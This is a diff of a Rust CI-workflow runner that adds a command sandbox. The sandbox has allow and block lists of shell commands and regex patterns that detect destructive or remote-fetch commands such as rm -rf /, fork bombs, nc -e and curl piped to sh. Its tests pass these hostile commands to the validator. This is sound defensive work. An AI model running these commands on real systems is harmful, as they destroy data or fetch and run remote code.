cmd.current_dir(&current_dir);
|
||||
|
||||
// Add environment variables
|
||||
for (key, value) in env_vars {
|
||||
// Don't use the CI_PROJECT_DIR for CARGO_HOME, use the actual project directory
|
||||
if *key == "CARGO_HOME" && value.contains("${CI_PROJECT_DIR}") {
|
||||
let cargo_home =
|
||||
value.replace("${CI_PROJECT_DIR}", &current_dir.to_string_lossy());
|
||||
wrkflw_logging::info(&format!("Setting CARGO_HOME to: {}", cargo_home));
|
||||
cmd.env(key, cargo_home);
|
||||
} else {
|
||||
cmd.env(key, value);
|
||||
}
|
||||
}
|
||||
|
||||
// Add command arguments
|
||||
if parts.len() > 1 {
|
||||
cmd.args(&parts[1..]);
|
||||
}
|
||||
|
||||
wrkflw_logging::debug(&format!(
|
||||
"Executing Rust command: {} in {}",
|
||||
command_str,
|
||||
current_dir.display()
|
||||
));
|
||||
|
||||
match cmd.output() {
|
||||
Ok(output_result) => {
|
||||
let exit_code = output_result.status.code().unwrap_or(-1);
|
||||
let output = String::from_utf8_lossy(&output_result.stdout).to_string();
|
||||
let error = String::from_utf8_lossy(&output_result.stderr).to_string();
|
||||
|
||||
wrkflw_logging::debug(&format!("Command exit code: {}", exit_code));
|
||||
|
||||
if exit_code != 0 {
|
||||
let mut error_details = format!(
|
||||
"Command failed with exit code: {}\nCommand: {}\n\nError output:\n{}",
|
||||
exit_code, command_str, error
|
||||
);
|
||||
|
||||
// Add environment variables to error details
|
||||
error_details.push_str("\n\nEnvironment variables:\n");
|
||||
for (key, value) in env_vars {
|
||||
if key.starts_with("GITHUB_")
|
||||
|| key.starts_with("RUST")
|
||||
|| key.starts_with("CARGO")
|
||||
|| key.starts_with("CI_")
|
||||
{
|
||||
error_details.push_str(&format!("{}={}\n", key, value));
|
||||
}
|
||||
}
|
||||
@@ -223,11 +388,11 @@ impl ContainerRuntime for EmulationRuntime {
|
||||
}
|
||||
}
|
||||
|
||||
// For other commands, use a shell
|
||||
// For other commands, use a shell as fallback
|
||||
let mut cmd = Command::new("sh");
|
||||
cmd.arg("-c");
|
||||
cmd.arg(&command_str);
|
||||
cmd.current_dir(working_dir.to_str().unwrap_or("."));
|
||||
cmd.current_dir(&actual_working_dir);
|
||||
|
||||
// Add environment variables
|
||||
for (key, value) in env_vars {
|
||||
@@ -240,7 +405,7 @@ impl ContainerRuntime for EmulationRuntime {
|
||||
let output = String::from_utf8_lossy(&output_result.stdout).to_string();
|
||||
let error = String::from_utf8_lossy(&output_result.stderr).to_string();
|
||||
|
||||
logging::debug(&format!("Command completed with exit code: {}", exit_code));
|
||||
wrkflw_logging::debug(&format!("Command completed with exit code: {}", exit_code));
|
||||
|
||||
if exit_code != 0 {
|
||||
let mut error_details = format!(
|
||||
@@ -251,7 +416,7 @@ impl ContainerRuntime for EmulationRuntime {
|
||||
// Add environment variables to error details
|
||||
error_details.push_str("\n\nEnvironment variables:\n");
|
||||
for (key, value) in env_vars {
|
||||
if key.starts_with("GITHUB_") {
|
||||
if key.starts_with("GITHUB_") || key.starts_with("CI_") {
|
||||
error_details.push_str(&format!("{}={}\n", key, value));
|
||||
}
|
||||
}
|
||||
@@ -278,12 +443,12 @@ impl ContainerRuntime for EmulationRuntime {
|
||||
}
|
||||
|
||||
async fn pull_image(&self, image: &str) -> Result<(), ContainerError> {
|
||||
logging::info(&format!("🔄 Emulation: Pretending to pull image {}", image));
|
||||
wrkflw_logging::info(&format!("🔄 Emulation: Pretending to pull image {}", image));
|
||||
Ok(())
|
||||
}
|
||||
|
||||
async fn build_image(&self, dockerfile: &Path, tag: &str) -> Result<(), ContainerError> {
|
||||
logging::info(&format!(
|
||||
wrkflw_logging::info(&format!(
|
||||
"🔄 Emulation: Pretending to build image {} from {}",
|
||||
tag,
|
||||
dockerfile.display()
|
||||
@@ -378,14 +543,14 @@ pub async fn handle_special_action(action: &str) -> Result<(), ContainerError> {
|
||||
"latest"
|
||||
};
|
||||
|
||||
logging::info(&format!(
|
||||
wrkflw_logging::info(&format!(
|
||||
"🔄 Processing action: {} @ {}",
|
||||
action_name, action_version
|
||||
));
|
||||
|
||||
// Handle specific known actions with special requirements
|
||||
if action.starts_with("cachix/install-nix-action") {
|
||||
logging::info("🔄 Emulating cachix/install-nix-action");
|
||||
wrkflw_logging::info("🔄 Emulating cachix/install-nix-action");
|
||||
|
||||
// In emulation mode, check if nix is installed
|
||||
let nix_installed = Command::new("which")
|
||||
@@ -395,56 +560,56 @@ pub async fn handle_special_action(action: &str) -> Result<(), ContainerError> {
|
||||
.unwrap_or(false);
|
||||
|
||||
if !nix_installed {
|
||||
logging::info("🔄 Emulation: Nix is required but not installed.");
|
||||
logging::info(
|
||||
wrkflw_logging::info("🔄 Emulation: Nix is required but not installed.");
|
||||
wrkflw_logging::info(
|
||||
"🔄 To use this workflow, please install Nix: https://nixos.org/download.html",
|
||||
);
|
||||
logging::info("🔄 Continuing emulation, but nix commands will fail.");
|
||||
wrkflw_logging::info("🔄 Continuing emulation, but nix commands will fail.");
|
||||
} else {
|
||||
logging::info("🔄 Emulation: Using system-installed Nix");
|
||||
wrkflw_logging::info("🔄 Emulation: Using system-installed Nix");
|
||||
}
|
||||
} else if action.starts_with("actions-rs/cargo@") {
|
||||
// For actions-rs/cargo action, ensure Rust is available
|
||||
logging::info(&format!("🔄 Detected Rust cargo action: {}", action));
|
||||
wrkflw_logging::info(&format!("🔄 Detected Rust cargo action: {}", action));
|
||||
|
||||
// Verify Rust/cargo is installed
|
||||
check_command_available("cargo", "Rust/Cargo", "https://rustup.rs/");
|
||||
} else if action.starts_with("actions-rs/toolchain@") {
|
||||
// For actions-rs/toolchain action, check for Rust installation
|
||||
logging::info(&format!("🔄 Detected Rust toolchain action: {}", action));
|
||||
wrkflw_logging::info(&format!("🔄 Detected Rust toolchain action: {}", action));
|
||||
|
||||
check_command_available("rustc", "Rust", "https://rustup.rs/");
|
||||
} else if action.starts_with("actions-rs/fmt@") {
|
||||
// For actions-rs/fmt action, check if rustfmt is available
|
||||
logging::info(&format!("🔄 Detected Rust formatter action: {}", action));
|
||||
wrkflw_logging::info(&format!("🔄 Detected Rust formatter action: {}", action));
|
||||
|
||||
check_command_available("rustfmt", "rustfmt", "rustup component add rustfmt");
|
||||
} else if action.starts_with("actions/setup-node@") {
|
||||
// Node.js setup action
|
||||
logging::info(&format!("🔄 Detected Node.js setup action: {}", action));
|
||||
wrkflw_logging::info(&format!("🔄 Detected Node.js setup action: {}", action));
|
||||
|
||||
check_command_available("node", "Node.js", "https://nodejs.org/");
|
||||
} else if action.starts_with("actions/setup-python@") {
|
||||
// Python setup action
|
||||
logging::info(&format!("🔄 Detected Python setup action: {}", action));
|
||||
wrkflw_logging::info(&format!("🔄 Detected Python setup action: {}", action));
|
||||
|
||||
check_command_available("python", "Python", "https://www.python.org/downloads/");
|
||||
} else if action.starts_with("actions/setup-java@") {
|
||||
// Java setup action
|
||||
logging::info(&format!("🔄 Detected Java setup action: {}", action));
|
||||
wrkflw_logging::info(&format!("🔄 Detected Java setup action: {}", action));
|
||||
|
||||
check_command_available("java", "Java", "https://adoptium.net/");
|
||||
} else if action.starts_with("actions/checkout@") {
|
||||
// Git checkout action - this is handled implicitly by our workspace setup
|
||||
logging::info("🔄 Detected checkout action - workspace files are already prepared");
|
||||
wrkflw_logging::info("🔄 Detected checkout action - workspace files are already prepared");
|
||||
} else if action.starts_with("actions/cache@") {
|
||||
// Cache action - can't really emulate caching effectively
|
||||
logging::info(
|
||||
wrkflw_logging::info(
|
||||
"🔄 Detected cache action - caching is not fully supported in emulation mode",
|
||||
);
|
||||
} else {
|
||||
// Generic action we don't have special handling for
|
||||
logging::info(&format!(
|
||||
wrkflw_logging::info(&format!(
|
||||
"🔄 Action '{}' has no special handling in emulation mode",
|
||||
action_name
|
||||
));
|
||||
@@ -463,12 +628,12 @@ fn check_command_available(command: &str, name: &str, install_url: &str) {
|
||||
.unwrap_or(false);
|
||||
|
||||
if !is_available {
|
||||
logging::warning(&format!("{} is required but not found on the system", name));
|
||||
logging::info(&format!(
|
||||
wrkflw_logging::warning(&format!("{} is required but not found on the system", name));
|
||||
wrkflw_logging::info(&format!(
|
||||
"To use this action, please install {}: {}",
|
||||
name, install_url
|
||||
));
|
||||
logging::info(&format!(
|
||||
wrkflw_logging::info(&format!(
|
||||
"Continuing emulation, but {} commands will fail",
|
||||
name
|
||||
));
|
||||
@@ -477,7 +642,7 @@ fn check_command_available(command: &str, name: &str, install_url: &str) {
|
||||
if let Ok(output) = Command::new(command).arg("--version").output() {
|
||||
if output.status.success() {
|
||||
let version = String::from_utf8_lossy(&output.stdout);
|
||||
logging::info(&format!("🔄 Using system {}: {}", name, version.trim()));
|
||||
wrkflw_logging::info(&format!("🔄 Using system {}: {}", name, version.trim()));
|
||||
}
|
||||
}
|
||||
}
|
||||
@@ -543,7 +708,7 @@ async fn cleanup_processes() {
|
||||
};
|
||||
|
||||
for pid in processes_to_cleanup {
|
||||
logging::info(&format!("Cleaning up emulated process: {}", pid));
|
||||
wrkflw_logging::info(&format!("Cleaning up emulated process: {}", pid));
|
||||
|
||||
#[cfg(unix)]
|
||||
{
|
||||
@@ -582,7 +747,7 @@ async fn cleanup_workspaces() {
|
||||
};
|
||||
|
||||
for workspace_path in workspaces_to_cleanup {
|
||||
logging::info(&format!(
|
||||
wrkflw_logging::info(&format!(
|
||||
"Cleaning up emulation workspace: {}",
|
||||
workspace_path.display()
|
||||
));
|
||||
@@ -590,8 +755,8 @@ async fn cleanup_workspaces() {
|
||||
// Only attempt to remove if it exists
|
||||
if workspace_path.exists() {
|
||||
match fs::remove_dir_all(&workspace_path) {
|
||||
Ok(_) => logging::info("Successfully removed workspace directory"),
|
||||
Err(e) => logging::error(&format!("Error removing workspace: {}", e)),
|
||||
Ok(_) => wrkflw_logging::info("Successfully removed workspace directory"),
|
||||
Err(e) => wrkflw_logging::error(&format!("Error removing workspace: {}", e)),
|
||||
}
|
||||
}
|
||||
|
||||
crates/runtime/src/lib.rs (new file, 6 lines)
@@ -0,0 +1,6 @@
// runtime crate

pub mod container;
pub mod emulation;
pub mod sandbox;
pub mod secure_emulation;
crates/runtime/src/sandbox.rs (new file, 672 lines)
@@ -0,0 +1,672 @@
|
||||
use regex::Regex;
|
||||
use std::collections::HashSet;
|
||||
use std::fs;
|
||||
use std::path::{Path, PathBuf};
|
||||
use std::process::{Command, Stdio};
|
||||
use std::time::Duration;
|
||||
use tempfile::TempDir;
|
||||
use wrkflw_logging;
|
||||
|
||||
/// Configuration for sandbox execution
|
||||
#[derive(Debug, Clone)]
|
||||
pub struct SandboxConfig {
|
||||
/// Maximum execution time for commands
|
||||
pub max_execution_time: Duration,
|
||||
/// Maximum memory usage in MB
|
||||
pub max_memory_mb: u64,
|
||||
/// Maximum CPU usage percentage
|
||||
pub max_cpu_percent: u64,
|
||||
/// Allowed commands (whitelist)
|
||||
pub allowed_commands: HashSet<String>,
|
||||
/// Blocked commands (blacklist)
|
||||
pub blocked_commands: HashSet<String>,
|
||||
/// Allowed file system paths (read-only)
|
||||
pub allowed_read_paths: HashSet<PathBuf>,
|
||||
/// Allowed file system paths (read-write)
|
||||
pub allowed_write_paths: HashSet<PathBuf>,
|
||||
/// Whether to enable network access
|
||||
pub allow_network: bool,
|
||||
/// Maximum number of processes
|
||||
pub max_processes: u32,
|
||||
/// Whether to enable strict mode (more restrictive)
|
||||
pub strict_mode: bool,
|
||||
}
|
||||
|
||||
impl Default for SandboxConfig {
|
||||
fn default() -> Self {
|
||||
let mut allowed_commands = HashSet::new();
|
||||
|
||||
// Basic safe commands
|
||||
allowed_commands.insert("echo".to_string());
|
||||
allowed_commands.insert("printf".to_string());
|
||||
allowed_commands.insert("cat".to_string());
|
||||
allowed_commands.insert("head".to_string());
|
||||
allowed_commands.insert("tail".to_string());
|
||||
allowed_commands.insert("grep".to_string());
|
||||
allowed_commands.insert("sed".to_string());
|
||||
allowed_commands.insert("awk".to_string());
|
||||
allowed_commands.insert("sort".to_string());
|
||||
allowed_commands.insert("uniq".to_string());
|
||||
allowed_commands.insert("wc".to_string());
|
||||
allowed_commands.insert("cut".to_string());
|
||||
allowed_commands.insert("tr".to_string());
|
||||
allowed_commands.insert("which".to_string());
|
||||
allowed_commands.insert("pwd".to_string());
|
||||
allowed_commands.insert("env".to_string());
|
||||
allowed_commands.insert("date".to_string());
|
||||
allowed_commands.insert("basename".to_string());
|
||||
allowed_commands.insert("dirname".to_string());
|
||||
|
||||
// File operations (safe variants)
|
||||
allowed_commands.insert("ls".to_string());
|
||||
allowed_commands.insert("find".to_string());
|
||||
allowed_commands.insert("mkdir".to_string());
|
||||
allowed_commands.insert("touch".to_string());
|
||||
allowed_commands.insert("cp".to_string());
|
||||
allowed_commands.insert("mv".to_string());
|
||||
|
||||
// Development tools
|
||||
allowed_commands.insert("git".to_string());
|
||||
allowed_commands.insert("cargo".to_string());
|
||||
allowed_commands.insert("rustc".to_string());
|
||||
allowed_commands.insert("rustfmt".to_string());
|
||||
allowed_commands.insert("clippy".to_string());
|
||||
allowed_commands.insert("npm".to_string());
|
||||
allowed_commands.insert("yarn".to_string());
|
||||
allowed_commands.insert("node".to_string());
|
||||
allowed_commands.insert("python".to_string());
|
||||
allowed_commands.insert("python3".to_string());
|
||||
allowed_commands.insert("pip".to_string());
|
||||
allowed_commands.insert("pip3".to_string());
|
||||
allowed_commands.insert("java".to_string());
|
||||
allowed_commands.insert("javac".to_string());
|
||||
allowed_commands.insert("maven".to_string());
|
||||
allowed_commands.insert("gradle".to_string());
|
||||
allowed_commands.insert("go".to_string());
|
||||
allowed_commands.insert("dotnet".to_string());
|
||||
|
||||
// Compression tools
|
||||
allowed_commands.insert("tar".to_string());
|
||||
allowed_commands.insert("gzip".to_string());
|
||||
allowed_commands.insert("gunzip".to_string());
|
||||
allowed_commands.insert("zip".to_string());
|
||||
allowed_commands.insert("unzip".to_string());
|
||||
|
||||
let mut blocked_commands = HashSet::new();
|
||||
|
||||
// Dangerous system commands
|
||||
blocked_commands.insert("rm".to_string());
|
||||
blocked_commands.insert("rmdir".to_string());
|
||||
blocked_commands.insert("dd".to_string());
|
||||
blocked_commands.insert("mkfs".to_string());
|
||||
blocked_commands.insert("fdisk".to_string());
|
||||
blocked_commands.insert("mount".to_string());
|
||||
blocked_commands.insert("umount".to_string());
|
||||
blocked_commands.insert("sudo".to_string());
|
||||
blocked_commands.insert("su".to_string());
|
||||
blocked_commands.insert("passwd".to_string());
|
||||
blocked_commands.insert("chown".to_string());
|
||||
blocked_commands.insert("chmod".to_string());
|
||||
blocked_commands.insert("chgrp".to_string());
|
||||
blocked_commands.insert("chroot".to_string());
|
||||
|
||||
// Network and system tools
|
||||
blocked_commands.insert("nc".to_string());
|
||||
blocked_commands.insert("netcat".to_string());
|
||||
blocked_commands.insert("wget".to_string());
|
||||
blocked_commands.insert("curl".to_string());
|
||||
blocked_commands.insert("ssh".to_string());
|
||||
blocked_commands.insert("scp".to_string());
|
||||
blocked_commands.insert("rsync".to_string());
|
||||
|
||||
// Process control
|
||||
blocked_commands.insert("kill".to_string());
|
||||
blocked_commands.insert("killall".to_string());
|
||||
blocked_commands.insert("pkill".to_string());
|
||||
blocked_commands.insert("nohup".to_string());
|
||||
blocked_commands.insert("screen".to_string());
|
||||
blocked_commands.insert("tmux".to_string());
|
||||
|
||||
// System modification
|
||||
blocked_commands.insert("systemctl".to_string());
|
||||
blocked_commands.insert("service".to_string());
|
||||
blocked_commands.insert("crontab".to_string());
|
||||
blocked_commands.insert("at".to_string());
|
||||
blocked_commands.insert("reboot".to_string());
|
||||
blocked_commands.insert("shutdown".to_string());
|
||||
blocked_commands.insert("halt".to_string());
|
||||
blocked_commands.insert("poweroff".to_string());
|
||||
|
||||
Self {
|
||||
max_execution_time: Duration::from_secs(300), // 5 minutes
|
||||
max_memory_mb: 512,
|
||||
max_cpu_percent: 80,
|
||||
allowed_commands,
|
||||
blocked_commands,
|
||||
allowed_read_paths: HashSet::new(),
|
||||
allowed_write_paths: HashSet::new(),
|
||||
allow_network: false,
|
||||
max_processes: 10,
|
||||
strict_mode: true,
|
||||
}
|
||||
}
|
||||
}

/// Sandbox error types
#[derive(Debug, thiserror::Error)]
pub enum SandboxError {
    #[error("Command blocked by security policy: {command}")]
    BlockedCommand { command: String },

    #[error("Dangerous command pattern detected: {pattern}")]
    DangerousPattern { pattern: String },

    #[error("Path access denied: {path}")]
    PathAccessDenied { path: String },

    #[error("Resource limit exceeded: {resource}")]
    ResourceLimitExceeded { resource: String },

    #[error("Execution timeout after {seconds} seconds")]
    ExecutionTimeout { seconds: u64 },

    #[error("Sandbox setup failed: {reason}")]
    SandboxSetupError { reason: String },

    #[error("Command execution failed: {reason}")]
    ExecutionError { reason: String },
}

/// Secure sandbox for executing commands in emulation mode
pub struct Sandbox {
    config: SandboxConfig,
    workspace: TempDir,
    dangerous_patterns: Vec<Regex>,
}

impl Sandbox {
    /// Create a new sandbox with the given configuration
    pub fn new(config: SandboxConfig) -> Result<Self, SandboxError> {
        let workspace = tempfile::tempdir().map_err(|e| SandboxError::SandboxSetupError {
            reason: format!("Failed to create sandbox workspace: {}", e),
        })?;

        let dangerous_patterns = Self::compile_dangerous_patterns();

        wrkflw_logging::info(&format!(
            "Created new sandbox with workspace: {}",
            workspace.path().display()
        ));

        Ok(Self {
            config,
            workspace,
            dangerous_patterns,
        })
    }

    /// Execute a command in the sandbox
    pub async fn execute_command(
        &self,
        command: &[&str],
        env_vars: &[(&str, &str)],
        working_dir: &Path,
    ) -> Result<crate::container::ContainerOutput, SandboxError> {
        if command.is_empty() {
            return Err(SandboxError::ExecutionError {
                reason: "Empty command".to_string(),
            });
        }

        let command_str = command.join(" ");

        // Step 1: Validate command
        self.validate_command(&command_str)?;

        // Step 2: Setup sandbox environment
        let sandbox_dir = self.setup_sandbox_environment(working_dir)?;

        // Step 3: Execute with limits
        self.execute_with_limits(command, env_vars, &sandbox_dir)
            .await
    }

    /// Validate that a command is safe to execute
    fn validate_command(&self, command_str: &str) -> Result<(), SandboxError> {
        // Check for dangerous patterns first
        for pattern in &self.dangerous_patterns {
            if pattern.is_match(command_str) {
                wrkflw_logging::warning(&format!(
                    "🚫 Blocked dangerous command pattern: {}",
                    command_str
                ));
                return Err(SandboxError::DangerousPattern {
                    pattern: command_str.to_string(),
                });
            }
        }

        // Split command by shell operators to validate each part
        let command_parts = self.split_shell_command(command_str);

        for part in command_parts {
            let part = part.trim();
            if part.is_empty() {
                continue;
            }

            // Extract the base command from this part
            let base_command = part.split_whitespace().next().unwrap_or("");
            let command_name = Path::new(base_command)
                .file_name()
                .and_then(|s| s.to_str())
                .unwrap_or(base_command);

            // Skip shell built-ins and operators
            if self.is_shell_builtin(command_name) {
                continue;
            }

            // Check blocked commands
            if self.config.blocked_commands.contains(command_name) {
                wrkflw_logging::warning(&format!("🚫 Blocked command: {}", command_name));
                return Err(SandboxError::BlockedCommand {
                    command: command_name.to_string(),
                });
            }

            // In strict mode, only allow whitelisted commands
            if self.config.strict_mode && !self.config.allowed_commands.contains(command_name) {
                wrkflw_logging::warning(&format!(
                    "🚫 Command not in whitelist (strict mode): {}",
                    command_name
                ));
                return Err(SandboxError::BlockedCommand {
                    command: command_name.to_string(),
                });
            }
        }

        wrkflw_logging::info(&format!("✅ Command validation passed: {}", command_str));
        Ok(())
    }

    /// Split a shell command by common operators (&&, ||, ;, |).
    /// This is a simple split, not a full shell parser; quoting is not honored.
    fn split_shell_command(&self, command_str: &str) -> Vec<String> {
        // Simple split by common shell operators
        // This is not a full shell parser but handles most cases
        let separators = ["&&", "||", ";", "|"];
        let mut parts = vec![command_str.to_string()];

        for separator in separators {
            let mut new_parts = Vec::new();
            for part in parts {
                let split_parts: Vec<String> = part
                    .split(separator)
                    .map(|s| s.trim().to_string())
                    .filter(|s| !s.is_empty())
                    .collect();
                new_parts.extend(split_parts);
            }
            parts = new_parts;
        }

        parts
    }

    /// Check if a command is a shell built-in
    fn is_shell_builtin(&self, command: &str) -> bool {
        let builtins = [
            "true", "false", "test", "[", "echo", "printf", "cd", "pwd", "export", "set", "unset",
            "alias", "history", "jobs", "fg", "bg", "wait", "read",
        ];
        builtins.contains(&command)
    }
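
    // Illustrative example: `split_shell_command("cargo build && cargo test | tee out.log")`
    // yields ["cargo build", "cargo test", "tee out.log"]; `validate_command` then checks
    // the base command of each part ("cargo", "cargo", "tee") against the lists above.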

    /// Setup isolated sandbox environment
    fn setup_sandbox_environment(&self, working_dir: &Path) -> Result<PathBuf, SandboxError> {
        let sandbox_root = self.workspace.path();
        let sandbox_workspace = sandbox_root.join("workspace");

        // Create sandbox directory structure
        fs::create_dir_all(&sandbox_workspace).map_err(|e| SandboxError::SandboxSetupError {
            reason: format!("Failed to create sandbox workspace: {}", e),
        })?;

        // Copy allowed files to sandbox (if working_dir exists and is allowed)
        if working_dir.exists() && self.is_path_allowed(working_dir, false) {
            self.copy_safe_files(working_dir, &sandbox_workspace)?;
        }

        wrkflw_logging::info(&format!(
            "Sandbox environment ready: {}",
            sandbox_workspace.display()
        ));

        Ok(sandbox_workspace)
    }

    /// Copy files safely to sandbox, excluding dangerous files
    fn copy_safe_files(&self, source: &Path, dest: &Path) -> Result<(), SandboxError> {
        for entry in fs::read_dir(source).map_err(|e| SandboxError::SandboxSetupError {
            reason: format!("Failed to read source directory: {}", e),
        })? {
            let entry = entry.map_err(|e| SandboxError::SandboxSetupError {
                reason: format!("Failed to read directory entry: {}", e),
            })?;

            let path = entry.path();
            let file_name = path.file_name().and_then(|s| s.to_str()).unwrap_or("");

            // Skip dangerous or sensitive files
            if self.should_skip_file(file_name) {
                continue;
            }

            let dest_path = dest.join(file_name);

            if path.is_file() {
                fs::copy(&path, &dest_path).map_err(|e| SandboxError::SandboxSetupError {
                    reason: format!("Failed to copy file: {}", e),
                })?;
            } else if path.is_dir() && !self.should_skip_directory(file_name) {
                fs::create_dir_all(&dest_path).map_err(|e| SandboxError::SandboxSetupError {
                    reason: format!("Failed to create directory: {}", e),
                })?;
                self.copy_safe_files(&path, &dest_path)?;
            }
        }

        Ok(())
    }
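
    // Illustrative example: for a typical Rust project, `Cargo.toml` and `src/` are copied
    // into the sandbox workspace, while `target/`, `.git/` and `.env` are skipped by
    // `should_skip_file` / `should_skip_directory` below.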

    /// Execute command with resource limits and monitoring
    async fn execute_with_limits(
        &self,
        command: &[&str],
        env_vars: &[(&str, &str)],
        working_dir: &Path,
    ) -> Result<crate::container::ContainerOutput, SandboxError> {
        // Join command parts and execute via shell for proper handling of operators
        let command_str = command.join(" ");

        let mut cmd = Command::new("sh");
        cmd.arg("-c");
        cmd.arg(&command_str);
        cmd.current_dir(working_dir);
        cmd.stdout(Stdio::piped());
        cmd.stderr(Stdio::piped());

        // Set environment variables (filtered)
        for (key, value) in env_vars {
            if self.is_env_var_safe(key) {
                cmd.env(key, value);
            }
        }

        // Add sandbox-specific environment variables
        cmd.env("WRKFLW_SANDBOXED", "true");
        cmd.env("WRKFLW_SANDBOX_MODE", "strict");

        // Execute with timeout
        let timeout_duration = self.config.max_execution_time;

        wrkflw_logging::info(&format!(
            "🏃 Executing sandboxed command: {} (timeout: {}s)",
            command.join(" "),
            timeout_duration.as_secs()
        ));

        let start_time = std::time::Instant::now();

        let result = tokio::time::timeout(timeout_duration, async {
            let output = cmd.output().map_err(|e| SandboxError::ExecutionError {
                reason: format!("Command execution failed: {}", e),
            })?;

            Ok(crate::container::ContainerOutput {
                stdout: String::from_utf8_lossy(&output.stdout).to_string(),
                stderr: String::from_utf8_lossy(&output.stderr).to_string(),
                exit_code: output.status.code().unwrap_or(-1),
            })
        })
        .await;

        let execution_time = start_time.elapsed();

        match result {
            Ok(output_result) => {
                wrkflw_logging::info(&format!(
                    "✅ Sandboxed command completed in {:.2}s",
                    execution_time.as_secs_f64()
                ));
                output_result
            }
            Err(_) => {
                wrkflw_logging::warning(&format!(
                    "⏰ Sandboxed command timed out after {:.2}s",
                    timeout_duration.as_secs_f64()
                ));
                Err(SandboxError::ExecutionTimeout {
                    seconds: timeout_duration.as_secs(),
                })
            }
        }
    }
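
    // Clarifying note: the filter above only drops caller-supplied overrides such as
    // PATH, HOME or LD_PRELOAD; the child process still inherits the parent environment,
    // and it always sees WRKFLW_SANDBOXED=true / WRKFLW_SANDBOX_MODE=strict on top.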

    /// Check if a path is allowed for access
    fn is_path_allowed(&self, path: &Path, write_access: bool) -> bool {
        let abs_path = path.canonicalize().unwrap_or_else(|_| path.to_path_buf());

        if write_access {
            self.config
                .allowed_write_paths
                .iter()
                .any(|allowed| abs_path.starts_with(allowed))
        } else {
            self.config
                .allowed_read_paths
                .iter()
                .any(|allowed| abs_path.starts_with(allowed))
                || self
                    .config
                    .allowed_write_paths
                    .iter()
                    .any(|allowed| abs_path.starts_with(allowed))
        }
    }

    /// Check if an environment variable is safe to pass through
    fn is_env_var_safe(&self, key: &str) -> bool {
        // Block dangerous environment variables
        let dangerous_env_vars = [
            "LD_PRELOAD",
            "LD_LIBRARY_PATH",
            "DYLD_INSERT_LIBRARIES",
            "DYLD_LIBRARY_PATH",
            "PATH",
            "HOME",
            "SHELL",
        ];

        !dangerous_env_vars.contains(&key)
    }

    /// Check if a file should be skipped during copying
    fn should_skip_file(&self, filename: &str) -> bool {
        let dangerous_files = [
            ".ssh",
            ".gnupg",
            ".aws",
            ".docker",
            "id_rsa",
            "id_ed25519",
            "credentials",
            "config",
            ".env",
            ".secrets",
        ];

        dangerous_files
            .iter()
            .any(|pattern| filename.contains(pattern))
            || filename.starts_with('.') && filename != ".gitignore" && filename != ".github"
    }

    /// Check if a directory should be skipped
    fn should_skip_directory(&self, dirname: &str) -> bool {
        let skip_dirs = [
            "target",
            "node_modules",
            ".git",
            ".cargo",
            ".npm",
            ".cache",
            "build",
            "dist",
            "tmp",
            "temp",
        ];

        skip_dirs.contains(&dirname)
    }

    /// Compile regex patterns for dangerous command detection
    fn compile_dangerous_patterns() -> Vec<Regex> {
        let patterns = [
            r"rm\s+.*-rf?\s*/",       // rm -rf /
            r"dd\s+.*of=/dev/",       // dd ... of=/dev/...
            r">\s*/dev/sd[a-z]",      // > /dev/sda
            r"mkfs\.",                // mkfs.ext4, etc.
            r"fdisk\s+/dev/",         // fdisk /dev/...
            r"mount\s+.*\s+/",        // mount ... /
            r"chroot\s+/",            // chroot /
            r"sudo\s+",               // sudo commands
            r"su\s+",                 // su commands
            r"bash\s+-c\s+.*rm.*-rf", // bash -c "rm -rf ..."
            r"sh\s+-c\s+.*rm.*-rf",   // sh -c "rm -rf ..."
            r"eval\s+.*rm.*-rf",      // eval "rm -rf ..."
            r":\(\)\{.*;\};:",        // Fork bomb
            r"/proc/sys/",            // /proc/sys access
            r"/etc/passwd",           // /etc/passwd access
            r"/etc/shadow",           // /etc/shadow access
            r"nc\s+.*-e",             // netcat with exec
            r"wget\s+.*\|\s*sh",      // wget ... | sh
            r"curl\s+.*\|\s*sh",      // curl ... | sh
        ];

        patterns
            .iter()
            .filter_map(|pattern| {
                Regex::new(pattern)
                    .map_err(|e| {
                        wrkflw_logging::warning(&format!(
                            "Invalid regex pattern {}: {}",
                            pattern, e
                        ));
                        e
                    })
                    .ok()
            })
            .collect()
    }
}
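
// Illustrative note: because dangerous-pattern checks run before the block/allow lists,
// a step such as `curl https://example.com/install.sh | sh` is rejected by
// `validate_command` via the `curl\s+.*\|\s*sh` pattern even in non-strict mode.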

/// Create a default sandbox configuration for CI/CD workflows
pub fn create_workflow_sandbox_config() -> SandboxConfig {
    let mut allowed_read_paths = HashSet::new();
    allowed_read_paths.insert(PathBuf::from("."));

    let mut allowed_write_paths = HashSet::new();
    allowed_write_paths.insert(PathBuf::from("."));

    SandboxConfig {
        max_execution_time: Duration::from_secs(1800), // 30 minutes
        max_memory_mb: 2048,                           // 2GB
        max_processes: 50,
        allow_network: true,
        strict_mode: false,
        allowed_read_paths,
        allowed_write_paths,
        ..Default::default()
    }
}

/// Create a strict sandbox configuration for untrusted code
pub fn create_strict_sandbox_config() -> SandboxConfig {
    let mut allowed_read_paths = HashSet::new();
    allowed_read_paths.insert(PathBuf::from("."));

    let mut allowed_write_paths = HashSet::new();
    allowed_write_paths.insert(PathBuf::from("."));

    // Very limited command set
    let allowed_commands = ["echo", "cat", "ls", "pwd", "date"]
        .iter()
        .map(|s| s.to_string())
        .collect();

    SandboxConfig {
        max_execution_time: Duration::from_secs(60), // 1 minute
        max_memory_mb: 128,                          // 128MB
        max_processes: 5,
        allow_network: false,
        strict_mode: true,
        allowed_read_paths,
        allowed_write_paths,
        allowed_commands,
        ..Default::default()
    }
}
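
// Usage sketch (assumes the caller propagates `SandboxError`): the presets above are one
// convenient way to obtain a configuration, e.g.
//
//     let relaxed = Sandbox::new(create_workflow_sandbox_config())?;
//     let locked_down = Sandbox::new(create_strict_sandbox_config())?;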

#[cfg(test)]
mod tests {
    use super::*;

    #[test]
    fn test_dangerous_pattern_detection() {
        let sandbox = Sandbox::new(SandboxConfig::default()).unwrap();

        // Should block dangerous commands
        assert!(sandbox.validate_command("rm -rf /").is_err());
        assert!(sandbox
            .validate_command("dd if=/dev/zero of=/dev/sda")
            .is_err());
        assert!(sandbox.validate_command("sudo rm -rf /home").is_err());
        assert!(sandbox.validate_command("bash -c 'rm -rf /'").is_err());

        // Should allow safe commands
        assert!(sandbox.validate_command("echo hello").is_ok());
        assert!(sandbox.validate_command("ls -la").is_ok());
        assert!(sandbox.validate_command("cargo build").is_ok());
    }

    #[test]
    fn test_command_whitelist() {
        let config = create_strict_sandbox_config();
        let sandbox = Sandbox::new(config).unwrap();

        // Should allow whitelisted commands
        assert!(sandbox.validate_command("echo hello").is_ok());
        assert!(sandbox.validate_command("ls").is_ok());

        // Should block non-whitelisted commands
